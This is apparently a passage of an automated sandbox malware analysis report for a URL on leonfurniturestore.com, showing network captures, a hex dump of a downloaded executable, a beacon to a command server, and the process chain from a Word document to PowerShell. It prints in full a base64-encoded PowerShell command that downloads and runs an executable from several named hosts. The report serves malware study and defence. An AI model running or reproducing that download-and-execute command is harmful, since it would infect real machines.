Feb 12, 2019 20:13:01.956264973 CET	218	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 12 Feb 2019 19:13:01 GMT Server: Apache Location: http://borsacat.com/9onrkqJ/ Content-Length: 236 Keep-Alive: timeout=5, max=150 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 6f 72 73 61 63 61 74 2e 63 6f 6d 2f 39 6f 6e 72 6b 71 4a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://borsacat.com/9onrkqJ/">here</a>.</p></body></html>
Feb 12, 2019 20:13:01.958029032 CET	218	OUT	GET /9onrkqJ/ HTTP/1.1 Host: borsacat.com
Feb 12, 2019 20:13:02.006755114 CET	219	IN	HTTP/1.1 200 OK Date: Tue, 12 Feb 2019 19:13:02 GMT Server: Apache X-Powered-By: PHP/5.6.37 Expires: Tue, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache Content-Disposition: attachment; filename="lmZBvQit.exe" Content-Transfer-Encoding: binary Last-Modified: Tue, 12 Feb 2019 19:13:02 GMT Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 9c a8 14 9e fd c6 47 9e fd c6 47 9e fd c6 47 97 85 55 47 91 fd c6 47 9e fd c7 47 86 fd c6 47 9e fd c6 47 9f fd c6 47 93 af 1d 47 9f fd c6 47 93 af 18 47 9f fd c6 47 52 69 63 68 9e fd c6 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e0 a9 a7 30 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 05 00 00 40 00 00 00 00 00 00 00 a0 01 00 da 22 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 06 00 00 00 06 00 00 00 06 00 01 00 00 00 00 00 00 60 03 00 00 10 00 00 00 00 00 00 02 00 41 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 57 00 00 48 00 00 00 94 d7 01 00 a0 00 00 00 00 10 02 00 50 3d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 9c 04 00 00 80 40 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 2b 00 00 00 10 00 00 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 5e 00 60 2e 72 64 61 74 61 00 00 da 9a 01 00 00 40 00 00 00 a0 01 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 23 00 00 00 e0 01 00 00 10 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 ea 00 c0 2e 76 30 00 00 00 00 00 50 3d 01 00 00 10 02 00 00 40 01 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 04 00 00 00 50 03 00 00 10 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$GGGUGGGGGGGGGGRichGPEL0@"@`AWHP=P@8@\|.textd+0^`.rdata@@@@.data0#.v0P=@@@.relocP0@B
Feb 12, 2019 20:13:02.006795883 CET	220	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006824970 CET	222	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006850958 CET	223	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Feb 12, 2019 20:13:02.006876945 CET	224	IN	Data Raw: 19 f7 89 4c 24 20 89 5c 24 08 89 7c 24 04 73 82 eb 00 b8 46 53 4b 59 2b 44 24 3c 8a 4c 24 3b 80 f1 57 8b 54 24 20 89 54 24 34 8b 54 24 34 8b 74 24 10 8a 2c 16 03 44 24 34 89 44 24 20 38 cd 0f 84 7a ff ff ff eb cb 55 89 e5 53 57 56 83 ec 28 8b 45 Data Ascii: L$ \$\|$sFSKY+D$<L$;WT$ T$4T$4t$,D$4D$ 8zUSWV(EMUu}9WE=W!+]]]EE*I9}MUutFEH<U$ut$L$EMAQuq$t$T$h(^_[]E5=W!M9tU@ff
Feb 12, 2019 20:13:02.006905079 CET	225	IN	Data Raw: 81 c3 55 81 9b ab 29 c2 66 89 7d e8 89 e0 8d 7d e8 89 78 10 89 50 0c 89 70 04 89 18 c7 40 08 0b d7 41 00 a1 38 40 40 00 89 4d e0 ff d0 83 ec 14 b9 93 dd 1c 00 89 e2 c7 02 93 dd 1c 00 8b 15 24 40 40 00 89 45 dc 89 4d d8 ff d2 83 ec 04 8b 0d 14 40 Data Ascii: U)f}}xPp@A8@@M$@@EM@@EE8^_[]UV0EEE4EE(@@El@@EU9u8Eu+E,@@EU`@@E+U5d@@EMU
Feb 12, 2019 20:13:02.006933928 CET	227	IN	Data Raw: 34 83 c4 08 5e 5d c3 55 89 e5 53 57 56 83 ec 54 8b 45 08 c7 45 f0 6a ae 5c 6d c6 45 ef 79 89 45 e8 e8 7e 0e 00 00 8b 4d f0 89 c2 89 14 24 89 45 e4 89 4d e0 89 55 dc e8 99 0d 00 00 31 c9 8b 40 78 8b 55 dc 01 c2 8b 75 e0 81 f6 6a ae 5c 6d 8b 7d e4 Data Ascii: 4^]USWVTEEj\mEyE~M$EMU1@xUuj\m}\}EEMM\| 9uU}]ut1:EM1u}4EMuUhEET^_[]1MUJ$EME4yMUe8] J\mQu
Feb 12, 2019 20:13:02.006968021 CET	228	IN	Data Raw: 25 8a 5d f1 80 c3 db 88 5d df 8b 7d ec 81 f7 fa ea c9 25 89 7d d4 2b 75 ec 89 75 bc 89 45 ac 89 4d a8 89 55 a4 eb 0e 8b 45 e0 8b 4d d0 89 45 c4 89 4d d8 eb 2f 8b 45 bc 89 45 c8 8b 45 d4 89 45 e0 8b 45 c8 0f b6 04 05 f3 cf 41 00 89 45 d0 8b 45 d0 Data Ascii: %]]}%}+uuEMUEMEM/EEEEEAEEMMM9rM46UEeUUUu}];}MM%!M6eE1MMM9GTA}<2}M]M}8s\^_[]EM
Feb 12, 2019 20:13:02.006985903 CET	229	IN	Data Raw: 8b 75 fa 66 81 f6 5f 9d 66 39 f0 89 4d c8 77 70 eb 6e 83 c4 44 5e 5d c3 8b 45 d0 8b 4d f4 81 c1 bb ba f1 8e 39 c8 77 3d eb 2a 8b 45 cc 8a 4d f3 80 c1 3c 89 45 d0 8b 45 d0 8b 55 d0 8b 75 f4 81 f6 46 45 0e 71 01 f2 8a 6c 05 d5 89 55 cc 38 cd 74 c6 Data Ascii: uf_f9MwpnD^]EM9w=*EM<EEUuFEqlU8thAh$ED$hAAGEqU+MWEqu4$D$T$MaEErUVEHEAEMduA9DB0^]
Feb 12, 2019 20:13:02.007011890 CET	230	IN	Data Raw: 8a 5c 08 03 8a 7c 24 1f 80 f7 c3 38 fb 89 74 24 0c 89 54 24 08 74 3c eb 1e 31 c0 b1 08 2a 4c 24 1f 8b 54 24 08 38 4a 01 8b 74 24 0c 0f 44 c6 8d 65 f4 5e 5f 5b 5d c3 31 c0 8d 65 f4 5e 5f 5b 5d c3 8a 44 24 1f 8b 4c 24 08 8a 11 34 93 38 c2 74 26 eb Data Ascii: \\|$8t$T$t<1*L$T$8Jt$De^_[]1e^_[]D$L$48t&D$ L$$5iT$t$)D$$rD$HT$=8tUSWVAMUfEtCEK`E}A$D$\|$uMU1MUE\|xtL
Feb 12, 2019 20:13:02.038960934 CET	232	IN	Data Raw: e4 89 4d b8 8b 4d b8 83 c1 24 89 4d 98 3a 45 9f 0f 87 73 ff ff ff eb 3d 66 b8 20 b5 8b 4d e0 66 8b 55 c2 66 2b 45 ee 89 4d cc 66 39 c2 74 bc eb 5e 8b 45 a0 8b 4d d4 8b 55 d4 8b 75 e0 89 55 ac 89 75 cc 39 c1 0f 82 d3 00 00 00 eb 9e f6 45 d3 01 75 Data Ascii: MM$M:Es=f MfUf+EMf9t^EMUuUu9Eu<zEffME@(EE@EE9E"Uu,EE\EMEE9BKEEEMWaM;EsjfEfJfMfMffEffuf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.1.16	49236	181.15.224.57	80	C:\Windows\System32\startedradar.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2019 20:14:33.609991074 CET	462	OUT	GET / HTTP/1.1 Cookie: 55193=HoTC9DGe9+F8n6zBTTuy+GWHm63lQSxcmAlGva3Kao04L64CnsGpcFMQIpsoIeOaWtHQuDMyxaXSDx1wPhNwdOm3OEfCNoSKj9RgMXnR3WTr+QwWzfnMGmbSg9hdXtbVDOmnf7WTrIDGPrSXQxJgUyScIjhAKBaaJC/11D+B+Y9jm379ECkn78pv6/zOXqZ/1oYa+5OLkVkU0lqyuBaiY2a0PDmNKWybkJPv7DhC/8qnKqUOrKKvCbTJSTXugxvsqoGHX7vUeSuyFaVfDTThr6ToCd9mmlS6Gy1PvZJKfMunlupwXJ6GASeAuCeUy3/pD2ez2xZDOO2P87McYuTRMr1S6bl7OkfQ6fVVO8nAG8pOfMuJI9zARL54B7LfNoaZx5LhOl4RV0Qi/6mrfmVbSz+HX5hnU66i8oLMzRBbcmbJAfpe User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 181.15.224.57 Connection: Keep-Alive Cache-Control: no-cache
Feb 12, 2019 20:14:44.746947050 CET	463	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Feb 2019 19:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 132 Connection: keep-alive Data Raw: b7 65 5c 7c a1 e6 18 25 5b c1 8a 83 ad d8 f1 b6 bc ca b8 c7 7c 55 e1 77 59 34 05 ac dc 12 43 2a f0 ab 6e 69 6e 7b 62 a0 d3 16 e3 29 1f 98 49 a4 11 19 d7 98 64 78 bc 74 3f f7 4c c5 bb d8 78 8f e1 31 fb 47 ee 91 1f f1 74 b5 d5 30 7e ce d5 86 08 00 9e 2e b9 b8 fb a5 8a 13 87 b4 40 14 2a 00 78 63 e0 c7 31 a5 dd f1 f4 55 30 e4 67 f7 ab f2 c6 68 a2 26 48 1f 40 ce d9 00 da b0 1d 8d 8e 73 7a 77 37 81 Data Ascii: e\\|%[\|UwY4Cnin{b)Idxt?Lx1Gt0~.@xc1U0gh&H@szw7

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 12, 2019 20:12:36.409452915 CET	184.175.67.101	443	192.168.1.16	49225	CN=leonfurniturestore.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Sat Sep 15 19:24:10 CEST 2018 Tue May 03 09:00:00 CEST 2011	Sun Sep 15 19:24:10 CEST 2019 Sat May 03 09:00:00 CEST 2031	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Feb 12, 2019 20:12:36.409452915 CET	184.175.67.101	443	192.168.1.16	49225	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 2320 Parent PID: 532

General

Start time:	20:12:32
Start date:	12/02/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x8e0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 2656 Parent PID: 2320

General

Start time:	20:12:33
Start date:	12/02/2019
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Imagebase:	0x8e0000
File size:	815312 bytes
MD5 hash:	EE79D654A04333F566DF07EBDE217928
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WINWORD.EXE PID: 1404 Parent PID: 2320

General

Start time:	20:12:51
Start date:	12/02/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Imagebase:	0x2fad0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 3392 Parent PID: 1404

General

Start time:	20:12:52
Start date:	12/02/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJwBqAFAAOQB2AFAAJwArACcAMAAzACcAKQA7ACQATwBIAFIAMgBwAGgAUwBYACAAPQAgACgAJwA4ADEAJwArACcAMAAnACkAOwAkAFUAcwBZAEkAUQBLAD0AKAAnAGMAMQAwAEYAJwArACcASQB0ACcAKQA7ACQAUwBOAFAAdwBaAGYAdwBaAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEgAUgAyAHAAaABTAFgAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABtAGgAMQBhAHoAUwBQAHEAIABpAG4AIAAkAFYAUABpAFoAVQBUAFgAKQB7AHQAcgB5AHsAJABJAEEAOQA1AFkAOAA4ADEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQBoADEAYQB6AFMAUABxACwAIAAkAFMATgBQAHcAWgBmAHcAWgApADsAJAByAFMAOQBuAGgAdQBxAD0AKAAnAHUAVgAnACsAJwB6ADYAbQBRACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAFMATgBQAHcAWgBmAHcAWgA7ACQAdQB0AGIAdgBVAHcAPQAoACcAaQBxADgAZABqAEcAJwArACcAUAAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABqAHoARwByAG4AQgAwAD0AKAAnAHIAJwArACcAWABTADYAawAnACsAJwBqAHoAJwApADsA
Imagebase:	0x21a70000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: 810.exe PID: 1512 Parent PID: 3392

General

Start time:	20:13:04
Start date:	12/02/2019
Path:	C:\Users\user\810.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\810.exe'
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 810.exe PID: 3520 Parent PID: 1512

General

Start time:	20:13:04
Start date:	12/02/2019
Path:	C:\Users\user\810.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\810.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: startedradar.exe PID: 3784 Parent PID: 408

General

Start time:	20:13:15
Start date:	12/02/2019
Path:	C:\Windows\System32\startedradar.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\startedradar.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: startedradar.exe PID: 3444 Parent PID: 3784

General

Start time:	20:13:17
Start date:	12/02/2019
Path:	C:\Windows\System32\startedradar.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\startedradar.exe
Imagebase:	0xd00000
File size:	212992 bytes
MD5 hash:	62C4B4A53927329BBBD9B78DE6E2FC01
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 810.exe PID: 1512 Parent PID: 3392 810.exeUNIQUE

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	91.4%
Signature Coverage:	7.4%
Total number of Nodes:	488
Total number of Limit Nodes:	9

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report http://leonfurniturestore.com/sec.myacc.resourses.biz/

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage